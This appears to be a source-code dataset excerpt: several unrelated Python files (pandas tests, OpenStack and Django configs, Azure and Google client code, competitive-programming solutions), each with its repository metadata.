tm.assert_categorical_equal(sp1, xp1)
tm.assert_categorical_equal(cat[:-1], sp1[1:])
# shift back
sn2 = cat.shift(-2)
xp2 = Categorical(
["c", "d", "a", np.nan, np.nan], categories=["a", "b", "c", "d"]
)
tm.assert_categorical_equal(sn2, xp2)
tm.assert_categorical_equal(cat[2:], sn2[:-2])
# shift by zero
tm.assert_categorical_equal(cat, cat.shift(0))
def test_nbytes(self):
cat = Categorical([1, 2, 3])
exp = 3 + 3 * 8 # 3 int8s for values + 3 int64s for categories
assert cat.nbytes == exp
def test_memory_usage(self):
cat = Categorical([1, 2, 3])
# .categories is an index, so we include the hashtable
assert 0 < cat.nbytes <= cat.memory_usage()
assert 0 < cat.nbytes <= cat.memory_usage(deep=True)
cat = Categorical(["foo", "foo", "bar"])
assert cat.memory_usage(deep=True) > cat.nbytes
if not PYPY:
# sys.getsizeof will call the .memory_usage with
# deep=True, and add on some GC overhead
diff = cat.memory_usage(deep=True) - sys.getsizeof(cat)
assert abs(diff) < 100
def test_map(self):
c = Categorical(list("ABABC"), categories=list("CBA"), ordered=True)
result = c.map(lambda x: x.lower())
exp = Categorical(list("ababc"), categories=list("cba"), ordered=True)
tm.assert_categorical_equal(result, exp)
c = Categorical(list("ABABC"), categories=list("ABC"), ordered=False)
result = c.map(lambda x: x.lower())
exp = Categorical(list("ababc"), categories=list("abc"), ordered=False)
tm.assert_categorical_equal(result, exp)
result = c.map(lambda x: 1)
# GH 12766: Return an index not an array
tm.assert_index_equal(result, Index(np.array([1] * 5, dtype=np.int64)))
@pytest.mark.parametrize("value", [1, "True", [1, 2, 3], 5.0])
def test_validate_inplace_raises(self, value):
cat = Categorical(["A", "B", "B", "C", "A"])
msg = (
'For argument "inplace" expected type bool, '
f"received type {type(value).__name__}"
)
with pytest.raises(ValueError, match=msg):
cat.set_ordered(value=True, inplace=value)
with pytest.raises(ValueError, match=msg):
cat.as_ordered(inplace=value)
with pytest.raises(ValueError, match=msg):
cat.as_unordered(inplace=value)
with pytest.raises(ValueError, match=msg):
cat.set_categories(["X", "Y", "Z"], rename=True, inplace=value)
with pytest.raises(ValueError, match=msg):
cat.rename_categories(["X", "Y", "Z"], inplace=value)
with pytest.raises(ValueError, match=msg):
cat.reorder_categories(["X", "Y", "Z"], ordered=True, inplace=value)
with pytest.raises(ValueError, match=msg):
cat.add_categories(new_categories=["D", "E", "F"], inplace=value)
with pytest.raises(ValueError, match=msg):
cat.remove_categories(removals=["D", "E", "F"], inplace=value)
with pytest.raises(ValueError, match=msg):
with tm.assert_produces_warning(FutureWarning):
# issue #37643 inplace kwarg deprecated
cat.remove_unused_categories(inplace=value)
with pytest.raises(ValueError, match=msg):
cat.sort_values(inplace=value)
| [
"[email protected]"
] | |
a7eaaf704b1ca43d729d3db96987a74947dc2a7e | ac42f1d918bdbd229968cea0954ed75250acd55c | /admin/dashboard/openstack_dashboard/dashboards/admin/networks/urls.py | 4cd1b60079c3d722609128d7ad46956075f117f1 | [
"Apache-2.0"
] | permissive | naanal/product | 016e18fd2f35608a0d8b8e5d2f75b653bac7111a | bbaa4cd60d4f2cdda6ce4ba3d36312c1757deac7 | refs/heads/master | 2020-04-03T22:40:48.712243 | 2016-11-15T11:22:00 | 2016-11-15T11:22:00 | 57,004,514 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 2,206 | py | # Copyright 2012 NEC Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from django.conf.urls import include
from django.conf.urls import url
from openstack_dashboard.dashboards.admin.networks.agents \
import views as agent_views
from openstack_dashboard.dashboards.admin.networks.ports \
import urls as port_urls
from openstack_dashboard.dashboards.admin.networks.ports \
import views as port_views
from openstack_dashboard.dashboards.admin.networks.subnets \
import urls as subnet_urls
from openstack_dashboard.dashboards.admin.networks.subnets \
import views as subnet_views
from openstack_dashboard.dashboards.admin.networks import views
NETWORKS = r'^(?P<network_id>[^/]+)/%s$'
urlpatterns = [
url(r'^$', views.IndexView.as_view(), name='index'),
url(r'^create/$', views.CreateView.as_view(), name='create'),
url(NETWORKS % 'update', views.UpdateView.as_view(), name='update'),
url(NETWORKS % 'detail', views.DetailView.as_view(), name='detail'),
url(NETWORKS % 'agents/add',
agent_views.AddView.as_view(), name='adddhcpagent'),
url(NETWORKS % 'subnets/create',
subnet_views.CreateView.as_view(), name='addsubnet'),
url(NETWORKS % 'ports/create',
port_views.CreateView.as_view(), name='addport'),
url(r'^(?P<network_id>[^/]+)/subnets/(?P<subnet_id>[^/]+)/update$',
subnet_views.UpdateView.as_view(), name='editsubnet'),
url(r'^(?P<network_id>[^/]+)/ports/(?P<port_id>[^/]+)/update$',
port_views.UpdateView.as_view(), name='editport'),
url(r'^subnets/', include(subnet_urls, namespace='subnets')),
url(r'^ports/', include(port_urls, namespace='ports')),
]
| [
"[email protected]"
] | |
3ca35f3537a824472f63b7833626c34abcf1e3e6 | befafdde28c285c049b924fa58ce6240a4ae8d3c | /python_solution/Backtracking/40_CombinationSumII.py | 3c2f5d5b703d0d38f2bbe30c891c104f20adad1e | [] | no_license | Dimen61/leetcode | 3364369bda2255b993581c71e2b0b84928e817cc | 052bd7915257679877dbe55b60ed1abb7528eaa2 | refs/heads/master | 2020-12-24T11:11:10.663415 | 2017-08-15T14:54:41 | 2017-08-15T14:54:41 | 73,179,221 | 4 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,530 | py | class Solution(object):
def combinationSum2(self, candidates, target):
"""
:type candidates: List[int]
:type target: int
:rtype: List[List[int]]
"""
enable_lst = [False for i in range(target+1)]
enable_lst[0] = True
candidates.sort()
for i in range(target):
if enable_lst[i]:
for num in candidates:
if i+num <= target:
enable_lst[i+num] = True
if not enable_lst[target]: return []
tmp_result = []
def search(total, index, combs):
"""
:type total: int
:type index: int
:rtype: void
"""
if total == 0:
tmp_result.append(combs)
return
elif index >= len(candidates) or total < 0:
return
num = candidates[index]
if total-num >= 0 and enable_lst[total-num]:
search(total-num, index+1, combs+[num])
search(total, index+1, combs)
search(target, 0, [])
tmp_result.sort()
result = []
last = None
for item in tmp_result:
if not last:
last = item
result.append(item)
else:
if last != item:
last = item
result.append(item)
return result | [
"[email protected]"
] | |
8c951a4ff5799e9f19a66c7679c2cbb6760522b1 | 593ecc21a7164ec293f23d75423e71ab3d9f3c54 | /LC29.py | 4851f8eb59c6ba7f464b3e832b78b17bb3b30c3a | [] | no_license | luckmimi/leetcode | e297c11960f0c72370523e5594d789bc4d55cf7c | 2257c6202e823a5cd71b630441c430f1bd08a896 | refs/heads/master | 2022-07-11T22:36:02.634148 | 2022-06-30T22:57:20 | 2022-06-30T22:57:20 | 214,880,666 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 516 | py | class Solution:
def divide(self, dividend: int, divisor: int) -> int:
sign = -1 if (dividend < 0) ^ (divisor < 0) else 1
a = abs(dividend)
b = abs(divisor)
res = 0
while b<= a:
mul = 1
tmp = b
while a >= (tmp <<1):
tmp <<= 1
mul <<= 1
res += mul
a -= tmp
res *= sign
if res > 2**31 -1 :
return 2** 31 -1
else:
return res
| [
"[email protected]"
] | |
5fd1184dce2377d92e2ff473b987d718c97bf42f | 5bd3122d230471b048429f5e9c49a0b39c8a54fc | /Atcoder_contests/ARC/R102A.py | 5e0b5a9bf32372b1adfd5381f0b6c1bc75432986 | [] | no_license | nao1412/Competitive_Programing_Codes | e230e2fa85027e41c5ee062083801bb299effe9b | 98c29b5ba75e75502cf27fcf365a7aedcd6c273c | refs/heads/main | 2023-06-05T18:45:59.733301 | 2021-06-23T15:02:25 | 2021-06-23T15:02:25 | 374,061,897 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 541 | py | import sys
sys.setrecursionlimit(10**7) # 再帰回数を増やす
import math
def I(): return int(input())
def LI(): return list(map(int, input().split()))
def MI(): return map(int, input().split())
def S(): return input()
def LS(): return list(map(str, input().split()))
def H(n): return [input() for i in range(n)]
mod = 10**9 + 7
def main():
n, k = MI()
if k % 2 == 0:
n1 = n // k
n2 = n1
if n % k >= k // 2:
n2 = n1 + 1
else:
n1 = n // k
n2 = 0
print(n1**3+n2**3)
if __name__ == '__main__':
main()
| [
"[email protected]"
] | |
b78816d355385165c2d46725802b6c6001eae314 | b1c99061474c4e2f2653f6f3d83931c949c58b13 | /Basic/chapter3/ReplaceTest.py | 1f7aca0428b31758f691b5eb62156031c05dd93f | [] | no_license | hyperaeon/python | df75346040a5ccc588e21b0d761493c59e1a4fe3 | 21d10ef7af3227d29092a6720666c0db8e418ec4 | refs/heads/master | 2016-09-14T08:58:53.794960 | 2016-04-26T05:34:56 | 2016-04-26T05:34:56 | 57,100,745 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 222 | py | __author__ = 'hzliyong'
cookie = '_da_ntes_uid=3LhpAfObU48aiOR0b28yZYXv;'
cookie = cookie.replace(';','')
print(cookie)
list
type = 'a'
if type == 'a':
list = 'type a'
if type == 'b':
list = 'type b'
print(list) | [
"[email protected]"
] | |
b7b297c84c0c3d1db89a06f2929ee93d987e0691 | eab1abf41e3e1bd276258be7aedfb4f2dfcc1b1e | /web/mydjango/geoapp/admin.py | 3d75606cf3e3ff9b2630865dc8782c03b65cc335 | [] | no_license | javiermaly/docker-python3-django2-postgres-postgis-geodjango-nginx | 1732e0df8d1bd4624b3385ac6757b48060814814 | 8ea5f2c9ed90013bab76b468d44e7cbabf8122f6 | refs/heads/master | 2021-11-25T14:47:09.901801 | 2018-03-26T01:03:39 | 2018-03-26T01:03:39 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 186 | py | from django.contrib import admin
from .models import GeoAlgo
@admin.register(GeoAlgo)
class GeoAlgoAdmin(admin.ModelAdmin):
list_display = ['nombre']
search_fields = ['nombre'] | [
"[email protected]"
] | |
3c0948318554ab6edf9a4f53a5192b3d04e696dd | a4ea525e226d6c401fdb87a6e9adfdc5d07e6020 | /src/azure-cli/azure/cli/command_modules/network/aaz/profile_2018_03_01_hybrid/network/vnet_gateway/_list_learned_routes.py | 789b238597180231c9dcdc90049d592a0ae04769 | [
"MIT",
"BSD-3-Clause",
"LGPL-2.0-or-later",
"GPL-1.0-or-later",
"MPL-2.0",
"LGPL-2.1-only",
"Apache-2.0",
"LGPL-2.1-or-later",
"BSD-2-Clause"
] | permissive | Azure/azure-cli | 13340eeca2e288e66e84d393fa1c8a93d46c8686 | a40fd14ad0b6e89720a2e58d4d9be3a6ce1535ca | refs/heads/dev | 2023-08-17T06:25:37.431463 | 2023-08-17T06:00:10 | 2023-08-17T06:00:10 | 51,040,886 | 4,018 | 3,310 | MIT | 2023-09-14T11:11:05 | 2016-02-04T00:21:51 | Python | UTF-8 | Python | false | false | 6,877 | py | # --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
#
# Code generated by aaz-dev-tools
# --------------------------------------------------------------------------------------------
# pylint: skip-file
# flake8: noqa
from azure.cli.core.aaz import *
@register_command(
"network vnet-gateway list-learned-routes",
)
class ListLearnedRoutes(AAZCommand):
"""This operation retrieves a list of routes the virtual network gateway has learned, including routes learned from BGP peers.
:example: Retrieve a list of learned routes.
az network vnet-gateway list-learned-routes -g MyResourceGroup -n MyVnetGateway
"""
_aaz_info = {
"version": "2017-10-01",
"resources": [
["mgmt-plane", "/subscriptions/{}/resourcegroups/{}/providers/microsoft.network/virtualnetworkgateways/{}/getlearnedroutes", "2017-10-01"],
]
}
AZ_SUPPORT_NO_WAIT = True
def _handler(self, command_args):
super()._handler(command_args)
return self.build_lro_poller(self._execute_operations, self._output)
_args_schema = None
@classmethod
def _build_arguments_schema(cls, *args, **kwargs):
if cls._args_schema is not None:
return cls._args_schema
cls._args_schema = super()._build_arguments_schema(*args, **kwargs)
# define Arg Group ""
_args_schema = cls._args_schema
_args_schema.resource_group = AAZResourceGroupNameArg(
required=True,
)
_args_schema.name = AAZStrArg(
options=["-n", "--name"],
help="Name of the VNet gateway.",
required=True,
id_part="name",
)
return cls._args_schema
def _execute_operations(self):
self.pre_operations()
yield self.VirtualNetworkGatewaysGetLearnedRoutes(ctx=self.ctx)()
self.post_operations()
@register_callback
def pre_operations(self):
pass
@register_callback
def post_operations(self):
pass
def _output(self, *args, **kwargs):
result = self.deserialize_output(self.ctx.vars.instance, client_flatten=True)
return result
class VirtualNetworkGatewaysGetLearnedRoutes(AAZHttpOperation):
CLIENT_TYPE = "MgmtClient"
def __call__(self, *args, **kwargs):
request = self.make_request()
session = self.client.send_request(request=request, stream=False, **kwargs)
if session.http_response.status_code in [202]:
return self.client.build_lro_polling(
self.ctx.args.no_wait,
session,
self.on_200,
self.on_error,
lro_options={"final-state-via": "location"},
path_format_arguments=self.url_parameters,
)
if session.http_response.status_code in [200]:
return self.client.build_lro_polling(
self.ctx.args.no_wait,
session,
self.on_200,
self.on_error,
lro_options={"final-state-via": "location"},
path_format_arguments=self.url_parameters,
)
return self.on_error(session.http_response)
@property
def url(self):
return self.client.format_url(
"/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualNetworkGateways/{virtualNetworkGatewayName}/getLearnedRoutes",
**self.url_parameters
)
@property
def method(self):
return "POST"
@property
def error_format(self):
return "MgmtErrorFormat"
@property
def url_parameters(self):
parameters = {
**self.serialize_url_param(
"resourceGroupName", self.ctx.args.resource_group,
required=True,
),
**self.serialize_url_param(
"subscriptionId", self.ctx.subscription_id,
required=True,
),
**self.serialize_url_param(
"virtualNetworkGatewayName", self.ctx.args.name,
required=True,
),
}
return parameters
@property
def query_parameters(self):
parameters = {
**self.serialize_query_param(
"api-version", "2017-10-01",
required=True,
),
}
return parameters
@property
def header_parameters(self):
parameters = {
**self.serialize_header_param(
"Accept", "application/json",
),
}
return parameters
def on_200(self, session):
data = self.deserialize_http_content(session)
self.ctx.set_var(
"instance",
data,
schema_builder=self._build_schema_on_200
)
_schema_on_200 = None
@classmethod
def _build_schema_on_200(cls):
if cls._schema_on_200 is not None:
return cls._schema_on_200
cls._schema_on_200 = AAZObjectType()
_schema_on_200 = cls._schema_on_200
_schema_on_200.value = AAZListType()
value = cls._schema_on_200.value
value.Element = AAZObjectType()
_element = cls._schema_on_200.value.Element
_element.as_path = AAZStrType(
serialized_name="asPath",
flags={"read_only": True},
)
_element.local_address = AAZStrType(
serialized_name="localAddress",
flags={"read_only": True},
)
_element.network = AAZStrType(
flags={"read_only": True},
)
_element.next_hop = AAZStrType(
serialized_name="nextHop",
flags={"read_only": True},
)
_element.origin = AAZStrType(
flags={"read_only": True},
)
_element.source_peer = AAZStrType(
serialized_name="sourcePeer",
flags={"read_only": True},
)
_element.weight = AAZIntType(
flags={"read_only": True},
)
return cls._schema_on_200
class _ListLearnedRoutesHelper:
"""Helper class for ListLearnedRoutes"""
__all__ = ["ListLearnedRoutes"]
| [
"[email protected]"
] | |
e7d33cb382cca997ef56c3849ba3489bc73be785 | fd90b8efa1daaec44b54797e549e0f738f4a5897 | /jianzhioffer/16. 数值的整数次方.py | b6c886f4358eab1f50ae4aa820f45932b011e28a | [] | no_license | ddz-mark/LeetCode | 2a622eeb655398ca9ebd9feee93a52cd114a77c4 | d557faf87374ad8c65634ee9d9e572b88a54913a | refs/heads/master | 2021-07-12T06:58:57.162657 | 2021-04-18T13:25:03 | 2021-04-18T13:25:03 | 244,403,881 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,809 | py | # 实现函数double Power(double base, int exponent),求base的exponent次方。不得使用库函数,同时不需要考虑大数问题。
#
# 示例 1:
#
# 输入: 2.00000, 10
# 输出: 1024.00000
# 示例 2:
#
# 输入: 2.10000, 3
# 输出: 9.26100
# 示例 3:
#
# 输入: 2.00000, -2
# 输出: 0.25000
# 解释: 2-2 = 1/22 = 1/4 = 0.25
# 思路一:优化方法,将指数分为奇数和偶数,偶数的话可以 x=x*x
# 判断奇偶的方法:对于(m+n) & 1,若结果为0,则(m+n)是偶数;若结果为1,则(m+n)为奇数;
# 递归思想:可以从后面往前面退,比如:
# 奇数的时候:return x * getPow(x, n-1)
# 偶数的时候:return getPow(x * x, n // 2)
class Solution(object):
def myPow(self, x, n):
"""
:type x: float
:type n: int
:rtype: float
"""
# 1. 迭代版本
# n_temp = abs(n)
# sum = 1
# while n_temp > 1:
#
# if n_temp & 1 == 0: # 偶数
# x = x * x
# n_temp = n_temp // 2
# else:
# sum = sum * x
# n_temp -= 1
# sum = sum * x
#
# if n < 0:
# return 1 / sum
# elif n ==0:
# return 1
# return sum
# 2. 递归版本
if n == 0:
return 1
elif n > 0:
return self.getPow(x, n)
else:
return self.getPow(1/x, -n)
def getPow(self, x, n):
# 递归算法,先写结束条件
if n == 1:
return x
if n & 1 == 0: # 偶数
return self.getPow(x * x, n // 2)
else:
return x * self.getPow(x, n-1)
if __name__ == '__main__':
ob = Solution()
print(ob.myPow(2.0, 3))
| [
"[email protected]"
] | |
a30be694eca63a88eff2b727822bab6367cf71fe | d0dfd680e92e9b32f24e6e034571ad4323a58103 | /src/yeahml/information/write_info.py | e25421e67c2746d55a8337851f10397129d59851 | [
"Apache-2.0"
] | permissive | yeahml/yeahml | 6d1523d01300532f19c54d8e9c320420df66ee5c | b51faff6625db5980151a4a5fac7bb49313df5c1 | refs/heads/master | 2023-08-11T16:49:41.181953 | 2020-11-14T20:33:58 | 2020-11-14T20:33:58 | 137,613,449 | 4 | 1 | Apache-2.0 | 2023-06-02T18:45:48 | 2018-06-16T22:11:19 | Python | UTF-8 | Python | false | false | 1,138 | py | import json
import pathlib
from typing import Any, Dict
def write_build_information(
model_cdict: Dict[str, Any], meta_cdict: Dict[str, Any]
) -> bool:
full_exp_path = (
pathlib.Path(meta_cdict["yeahml_dir"])
.joinpath(meta_cdict["data_name"])
.joinpath(meta_cdict["experiment_name"])
)
json_path = pathlib.Path(full_exp_path).joinpath("info.json")
data_to_write = {}
KEYS_TO_WRITE = ["model_hash"]
if pathlib.Path(json_path).exists():
with open(json_path) as json_file:
data = json.load(json_file)
for k in KEYS_TO_WRITE:
if not k == "model_hash" and not meta_cdict["name_overwrite"]:
assert (
data[k] == model_cdict[k]
), f"info at {json_path} already contains the same values for keys {k}, but {json_path}={data[k]} and model config = {model_cdict[k]}\n > possible solution: change the name of the current model?"
for k in KEYS_TO_WRITE:
data_to_write[k] = model_cdict[k]
with open(json_path, "w") as outfile:
json.dump(data_to_write, outfile)
return True
| [
"[email protected]"
] | |
f60472dc9f2c47ee9077d7de07554b3dae6f0215 | 5c72f7709e501bd0ca3c5dc1e1f21cfffda13582 | /rebench/model/measurement.py | 40af4d69df6564115af83afce35a6769e7585c55 | [] | no_license | lhoste-bell/ReBench | 74ccb400aa5f262b56659afac3b7db873bd6a8d2 | 0f5c678b045b5208e9a2bed01629c780bef52da5 | refs/heads/master | 2021-01-17T07:57:14.440676 | 2016-05-23T19:25:58 | 2016-05-23T19:25:58 | 60,706,933 | 0 | 0 | null | 2016-06-08T15:06:26 | 2016-06-08T15:06:25 | null | UTF-8 | Python | false | false | 2,563 | py | # Copyright (c) 2009-2014 Stefan Marr <http://www.stefan-marr.de/>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to
# deal in the Software without restriction, including without limitation the
# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or
# sell copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
from datetime import datetime
from .run_id import RunId
class Measurement(object):
def __init__(self, value, unit, run_id, criterion = 'total',
timestamp = None):
self._run_id = run_id
self._criterion = criterion
self._value = value
self._unit = unit
self._timestamp = timestamp or datetime.now()
def is_total(self):
return self._criterion == 'total'
@property
def criterion(self):
return self._criterion
@property
def value(self):
return self._value
@property
def unit(self):
return self._unit
@property
def timestamp(self):
return self._timestamp
@property
def run_id(self):
return self._run_id
TIME_FORMAT = "%Y-%m-%dT%H:%M:%S"
def as_str_list(self):
return ["[" + self._timestamp.strftime(self.TIME_FORMAT) + "]",
"%f" % self._value,
self._unit,
self._criterion] + self._run_id.as_str_list()
@classmethod
def from_str_list(cls, data_store, str_list):
timestamp = datetime.strptime(str_list[0][1:-1], cls.TIME_FORMAT)
value = float(str_list[1])
unit = str_list[2]
criterion = str_list[3]
run_id = RunId.from_str_list(data_store, str_list[4:])
return Measurement(value, unit, run_id, criterion, timestamp)
| [
"[email protected]"
] | |
ce4e263dde23b1fdcc64494a2f9403ddfdfb1d07 | f5f40cee05de885ee059bcf4760e16f3f01ed23c | /ims/exceptions.py | c359b0a8626603fd8084e35af12b1dcce84a8c5e | [] | no_license | MarsWizard/imagebank | 68693207d71024bd0cdc608984d80fc0c7b6f751 | 916a9f087194052e77751fd8d52c930e77a7b04d | refs/heads/master | 2021-04-17T16:57:55.356760 | 2020-10-20T05:34:23 | 2020-10-20T05:34:23 | 249,460,889 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 452 | py | ERROR_OBJECT_NOT_FOUND = 10001
PARAMETER_REQUIRED = 10002
INVALID_IMAGE_FILE = 10003
class ImsException(BaseException):
def __init__(self, error_code, error_msg):
self.error_code = error_code
self.error_msg = error_msg
class InvalidImageFile(ImsException):
def __init__(self):
super(InvalidImageFile, self).__init__(INVALID_IMAGE_FILE,
'Invalid Image File') | [
"[email protected]"
] | |
477f89560ab67fce9dddcc436863915129dc25bd | 707bd0e873ae25146f1341b40d8efbf5134025af | /unifypage/migrations/0004_auto_20161021_0933.py | 781e95f7baa886a438135233d4469070f9415423 | [] | no_license | yosmangel/djangoLn2x | 76acd748adfddb5b21ad3e0342e3d7eb19b81bc9 | 24d068458e8271aacfa98d762c0dc117e65d41cf | refs/heads/master | 2021-04-27T07:55:36.488176 | 2017-06-01T17:48:26 | 2017-06-01T17:48:26 | 122,641,881 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 600 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.10.2 on 2016-10-21 08:33
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('unifypage', '0003_auto_20161020_1746'),
]
operations = [
migrations.RemoveField(
model_name='row',
name='background_url',
),
migrations.AddField(
model_name='row',
name='background',
field=models.CharField(blank=True, max_length=500, verbose_name='Background'),
),
]
| [
"[email protected]"
] | |
f2b7180d176b4eec46c3794ea9526f5ec48beb91 | 228ebc9fb20f25dd3ed2a6959aac41fd31314e64 | /google/cloud/aiplatform_v1beta1/services/migration_service/transports/base.py | 3405e5f21603a2bae9a6b0b1b8a675b832545a71 | [
"Apache-2.0"
] | permissive | orionnye/python-aiplatform | 746e3df0c75025582af38223829faeb2656dc653 | e3ea683bf754832340853a15bdb0a0662500a70f | refs/heads/main | 2023-08-03T06:14:50.689185 | 2021-09-24T03:24:14 | 2021-09-24T03:24:14 | 410,091,957 | 1 | 0 | Apache-2.0 | 2021-09-24T20:21:01 | 2021-09-24T20:21:00 | null | UTF-8 | Python | false | false | 7,763 | py | # -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import abc
from typing import Awaitable, Callable, Dict, Optional, Sequence, Union
import packaging.version
import pkg_resources
import google.auth # type: ignore
import google.api_core # type: ignore
from google.api_core import exceptions as core_exceptions # type: ignore
from google.api_core import gapic_v1 # type: ignore
from google.api_core import retry as retries # type: ignore
from google.api_core import operations_v1 # type: ignore
from google.auth import credentials as ga_credentials # type: ignore
from google.oauth2 import service_account # type: ignore
from google.cloud.aiplatform_v1beta1.types import migration_service
from google.longrunning import operations_pb2 # type: ignore
try:
DEFAULT_CLIENT_INFO = gapic_v1.client_info.ClientInfo(
gapic_version=pkg_resources.get_distribution(
"google-cloud-aiplatform",
).version,
)
except pkg_resources.DistributionNotFound:
DEFAULT_CLIENT_INFO = gapic_v1.client_info.ClientInfo()
try:
# google.auth.__version__ was added in 1.26.0
_GOOGLE_AUTH_VERSION = google.auth.__version__
except AttributeError:
try: # try pkg_resources if it is available
_GOOGLE_AUTH_VERSION = pkg_resources.get_distribution("google-auth").version
except pkg_resources.DistributionNotFound: # pragma: NO COVER
_GOOGLE_AUTH_VERSION = None
class MigrationServiceTransport(abc.ABC):
"""Abstract transport class for MigrationService."""
AUTH_SCOPES = ("https://www.googleapis.com/auth/cloud-platform",)
DEFAULT_HOST: str = "aiplatform.googleapis.com"
def __init__(
self,
*,
host: str = DEFAULT_HOST,
credentials: ga_credentials.Credentials = None,
credentials_file: Optional[str] = None,
scopes: Optional[Sequence[str]] = None,
quota_project_id: Optional[str] = None,
client_info: gapic_v1.client_info.ClientInfo = DEFAULT_CLIENT_INFO,
always_use_jwt_access: Optional[bool] = False,
**kwargs,
) -> None:
"""Instantiate the transport.
Args:
host (Optional[str]):
The hostname to connect to.
credentials (Optional[google.auth.credentials.Credentials]): The
authorization credentials to attach to requests. These
credentials identify the application to the service; if none
are specified, the client will attempt to ascertain the
credentials from the environment.
credentials_file (Optional[str]): A file with credentials that can
be loaded with :func:`google.auth.load_credentials_from_file`.
This argument is mutually exclusive with credentials.
scopes (Optional[Sequence[str]]): A list of scopes.
quota_project_id (Optional[str]): An optional project to use for billing
and quota.
client_info (google.api_core.gapic_v1.client_info.ClientInfo):
The client info used to send a user-agent string along with
API requests. If ``None``, then default info will be used.
Generally, you only need to set this if you're developing
your own client library.
always_use_jwt_access (Optional[bool]): Whether self signed JWT should
be used for service account credentials.
"""
# Save the hostname. Default to port 443 (HTTPS) if none is specified.
if ":" not in host:
host += ":443"
self._host = host
scopes_kwargs = self._get_scopes_kwargs(self._host, scopes)
# Save the scopes.
self._scopes = scopes
# If no credentials are provided, then determine the appropriate
# defaults.
if credentials and credentials_file:
raise core_exceptions.DuplicateCredentialArgs(
"'credentials_file' and 'credentials' are mutually exclusive"
)
if credentials_file is not None:
credentials, _ = google.auth.load_credentials_from_file(
credentials_file, **scopes_kwargs, quota_project_id=quota_project_id
)
elif credentials is None:
credentials, _ = google.auth.default(
**scopes_kwargs, quota_project_id=quota_project_id
)
# If the credentials is service account credentials, then always try to use self signed JWT.
if (
always_use_jwt_access
and isinstance(credentials, service_account.Credentials)
and hasattr(service_account.Credentials, "with_always_use_jwt_access")
):
credentials = credentials.with_always_use_jwt_access(True)
# Save the credentials.
self._credentials = credentials
# TODO(busunkim): This method is in the base transport
# to avoid duplicating code across the transport classes. These functions
# should be deleted once the minimum required versions of google-auth is increased.
# TODO: Remove this function once google-auth >= 1.25.0 is required
@classmethod
def _get_scopes_kwargs(
cls, host: str, scopes: Optional[Sequence[str]]
) -> Dict[str, Optional[Sequence[str]]]:
"""Returns scopes kwargs to pass to google-auth methods depending on the google-auth version"""
scopes_kwargs = {}
if _GOOGLE_AUTH_VERSION and (
packaging.version.parse(_GOOGLE_AUTH_VERSION)
>= packaging.version.parse("1.25.0")
):
scopes_kwargs = {"scopes": scopes, "default_scopes": cls.AUTH_SCOPES}
else:
scopes_kwargs = {"scopes": scopes or cls.AUTH_SCOPES}
return scopes_kwargs
def _prep_wrapped_messages(self, client_info):
# Precompute the wrapped methods.
self._wrapped_methods = {
self.search_migratable_resources: gapic_v1.method.wrap_method(
self.search_migratable_resources,
default_timeout=None,
client_info=client_info,
),
self.batch_migrate_resources: gapic_v1.method.wrap_method(
self.batch_migrate_resources,
default_timeout=None,
client_info=client_info,
),
}
@property
def operations_client(self) -> operations_v1.OperationsClient:
"""Return the client designed to process long-running operations."""
raise NotImplementedError()
@property
def search_migratable_resources(
self,
) -> Callable[
[migration_service.SearchMigratableResourcesRequest],
Union[
migration_service.SearchMigratableResourcesResponse,
Awaitable[migration_service.SearchMigratableResourcesResponse],
],
]:
raise NotImplementedError()
@property
def batch_migrate_resources(
self,
) -> Callable[
[migration_service.BatchMigrateResourcesRequest],
Union[operations_pb2.Operation, Awaitable[operations_pb2.Operation]],
]:
raise NotImplementedError()
__all__ = ("MigrationServiceTransport",)
| [
"[email protected]"
] | |
369763c0f219753bd8c6a490f0df5b72badcc7f3 | 4f730232e528083d868d92640443e0c327329ec6 | /scripts/rhinoscript/userinterface.py | ea6bb5de00e2c23f0600cd085af2986ca73deabc | [
"LicenseRef-scancode-warranty-disclaimer"
